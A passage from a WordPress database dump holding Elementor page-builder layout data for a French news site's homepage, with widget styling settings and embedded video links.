er_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"209drec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1442,495,'_elementor_version','0.4'),(1443,495,'_elementor_css','a:3:{s:4:\"time\";i:1508921392;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1445,496,'_elementor_edit_mode','builder'),(1446,496,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"209drec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1447,496,'_elementor_version','0.4'),(1448,496,'_elementor_css','a:3:{s:4:\"time\";i:1508921464;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1450,497,'_elementor_edit_mode','builder'),(1451,497,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements